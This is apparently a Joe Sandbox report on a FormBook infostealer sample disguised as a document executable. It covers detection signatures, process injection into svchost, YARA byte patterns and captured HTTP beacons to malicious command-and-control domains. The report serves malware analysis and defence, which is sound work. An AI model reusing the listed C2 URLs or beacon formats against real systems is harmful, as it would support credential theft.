Edit tour

Windows Analysis Report
Document 151-512024.exe

Overview

General Information

Sample name:	Document 151-512024.exe
Analysis ID:	1438042
MD5:	8e009a43143d3afdde5e91b311e4018b
SHA1:	332f1f946b6aaadecb3de55c5880d0c61021073f
SHA256:	75cdc03e89729226eaefb9259aab9beb4052ddef0280bbf53dcaf8ef9f58d917
Tags:	exe
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected FormBook

Binary is likely a compiled AutoIt script file

Found API chain indicative of sandbox detection

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Connects to several IPs in different countries

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

Document 151-512024.exe (PID: 7456 cmdline: "C:\Users\user\Desktop\Document 151-512024.exe" MD5: 8E009A43143D3AFDDE5E91B311E4018B)

svchost.exe (PID: 7512 cmdline: "C:\Users\user\Desktop\Document 151-512024.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

dZxfFeGGZbzJaFRaN.exe (PID: 6764 cmdline: "C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

netbtugc.exe (PID: 7976 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)

dZxfFeGGZbzJaFRaN.exe (PID: 1816 cmdline: "C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 7296 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.1392971539.0000000003190000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1392971539.0000000003190000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000A.00000002.3688668535.0000000002E90000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.3688668535.0000000002E90000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000A.00000002.3686290568.0000000002C00000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.3686290568.0000000002C00000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000A.00000002.3688949432.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.3688949432.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1392632147.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1392632147.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000009.00000002.3690392371.0000000003620000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.3690392371.0000000003620000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5843cd:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x56da6c:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1393386838.0000000004E00000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1393386838.0000000004E00000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5843cd:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x56da6c:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Document 151-512024.exe", CommandLine: "C:\Users\user\Desktop\Document 151-512024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Document 151-512024.exe", ParentImage: C:\Users\user\Desktop\Document 151-512024.exe, ParentProcessId: 7456, ParentProcessName: Document 151-512024.exe, ProcessCommandLine: "C:\Users\user\Desktop\Document 151-512024.exe", ProcessId: 7512, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\Document 151-512024.exe", CommandLine: "C:\Users\user\Desktop\Document 151-512024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Document 151-512024.exe", ParentImage: C:\Users\user\Desktop\Document 151-512024.exe, ParentProcessId: 7456, ParentProcessName: Document 151-512024.exe, ProcessCommandLine: "C:\Users\user\Desktop\Document 151-512024.exe", ProcessId: 7512, ProcessName: svchost.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.kasegitai.tokyo/fo8o/?FBEd=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8trWN3l8ixOWtQL9yeTsuNSglH2B9sA==&4h8=YPQX8Tch	Avira URL Cloud: Label: malware
Source: http://www.empowermedeco.com	Avira URL Cloud: Label: malware
Source: http://www.elettrosistemista.zip/fo8o/	Avira URL Cloud: Label: malware
Source: http://www.empowermedeco.com/fo8o/	Avira URL Cloud: Label: malware
Source: http://www.kasegitai.tokyo/fo8o/	Avira URL Cloud: Label: malware
Source: http://www.660danm.top/fo8o/	Avira URL Cloud: Label: malware
Source: http://www.elettrosistemista.zip/fo8o/?4h8=YPQX8Tch&FBEd=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNnVmQq+khzPxid8+dZ7ofOMdeDHH5A==	Avira URL Cloud: Label: malware
Source: http://www.magmadokum.com/fo8o/?4h8=YPQX8Tch&FBEd=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMRwjYf1n6/EmRSSw2BgpSj1BbNsbEQ==	Avira URL Cloud: Label: malware
Source: http://www.magmadokum.com/fo8o/	Avira URL Cloud: Label: malware
Source: http://www.empowermedeco.com/fo8o/?FBEd=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZVFf0Y/DWu0uYrbCSDy6fTugJKp8nA==&4h8=YPQX8Tch	Avira URL Cloud: Label: malware
Source: http://www.660danm.top/fo8o/?4h8=YPQX8Tch&FBEd=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrIKb5dMy/A4l/RoFCElkJ//A4REmieQ==	Avira URL Cloud: Label: malware
Source: https://www.empowermedeco.com/fo8o/?FBEd=mxnR	Avira URL Cloud: Label: malware
Source: http://www.techchains.info/fo8o/	Avira URL Cloud: Label: phishing

Multi AV Scanner detection for submitted file

Source: Document 151-512024.exe	ReversingLabs: Detection: 63%
Source: Document 151-512024.exe	Virustotal: Detection: 61%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1392971539.0000000003190000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3688668535.0000000002E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3686290568.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3688949432.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1392632147.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3690392371.0000000003620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1393386838.0000000004E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Machine Learning detection for sample

Source: Document 151-512024.exe

Joe Sandbox ML: detected

Source: Document 151-512024.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: dZxfFeGGZbzJaFRaN.exe, 00000009.00000002.3689713194.0000000000BEE000.00000002.00000001.01000000.00000005.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3689548451.0000000000BEE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: Document 151-512024.exe, 00000000.00000003.1222502312.0000000003860000.00000004.00001000.00020000.00000000.sdmp, Document 151-512024.exe, 00000000.00000003.1223460110.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1278781455.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1393001224.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1393001224.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1275345083.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1396093652.000000000321A000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3691575499.000000000355E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3691575499.00000000033C0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1393025365.000000000306C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Document 151-512024.exe, 00000000.00000003.1222502312.0000000003860000.00000004.00001000.00020000.00000000.sdmp, Document 151-512024.exe, 00000000.00000003.1223460110.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1278781455.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1393001224.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1393001224.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1275345083.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 0000000A.00000003.1396093652.000000000321A000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3691575499.000000000355E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3691575499.00000000033C0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1393025365.000000000306C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.1392801027.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1344247546.0000000002C14000.00000004.00000020.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 00000009.00000002.3688580630.00000000004B8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: netbtugc.exe, 0000000A.00000002.3692885046.00000000039EC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3689176760.0000000002F6E000.00000004.00000020.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.000000000274C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1686439407.000000000E69C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: netbtugc.exe, 0000000A.00000002.3692885046.00000000039EC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3689176760.0000000002F6E000.00000004.00000020.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.000000000274C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1686439407.000000000E69C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.1392801027.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1344247546.0000000002C14000.00000004.00000020.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 00000009.00000002.3688580630.00000000004B8000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_009ADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_009ADBBE
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_0097C2A2 FindFirstFileExW,	0_2_0097C2A2
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_009B68EE FindFirstFileW,FindClose,	0_2_009B68EE
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_009B698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_009B698F
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_009AD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_009AD076
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_009AD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_009AD3A9
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_009B9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_009B9642
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_009B979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_009B979D
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_009B9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_009B9B2B
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_009B5C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_009B5C97
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02C1BAB0 FindFirstFileW,FindNextFileW,FindClose,	10_2_02C1BAB0

Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4x nop then xor eax, eax		10_2_02C09480
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4x nop then pop edi		10_2_02C0DD45

Networking

Performs DNS queries to domains with low reputation

Source:

DNS query: www.joyesi.xyz

Source: unknown

Network traffic detected: IP country count 11

Source: Joe Sandbox View	IP Address: 91.195.240.94 91.195.240.94
Source: Joe Sandbox View	IP Address: 195.110.124.133 195.110.124.133

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Document 151-512024.exe

Code function: 0_2_009BCE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_009BCE44

Source: global traffic	HTTP traffic detected: GET /fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?FBEd=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8trWN3l8ixOWtQL9yeTsuNSglH2B9sA==&4h8=YPQX8Tch HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.kasegitai.tokyoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?4h8=YPQX8Tch&FBEd=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwnciuyQsy8w1cq+9C58fB3trEND4VQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?FBEd=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZbzJQ+JklL0Sj0639iiSTIgkj8wGO6A==&4h8=YPQX8Tch HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.antonio-vivaldi.mobiConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?4h8=YPQX8Tch&FBEd=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMRwjYf1n6/EmRSSw2BgpSj1BbNsbEQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?FBEd=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo8oWpH62KBeZ0RVxT0MiM3+/B0IJ8Q==&4h8=YPQX8Tch HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?FBEd=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hbvgW/E7EGitLXVKOGZWUueXafmCZ6g==&4h8=YPQX8Tch HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?4h8=YPQX8Tch&FBEd=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNnVmQq+khzPxid8+dZ7ofOMdeDHH5A== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?FBEd=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pDU2kX3sntZxTqRpQa59jNJPZojQ7fw==&4h8=YPQX8Tch HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.donnavariedades.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?4h8=YPQX8Tch&FBEd=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrIKb5dMy/A4l/RoFCElkJ//A4REmieQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.660danm.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
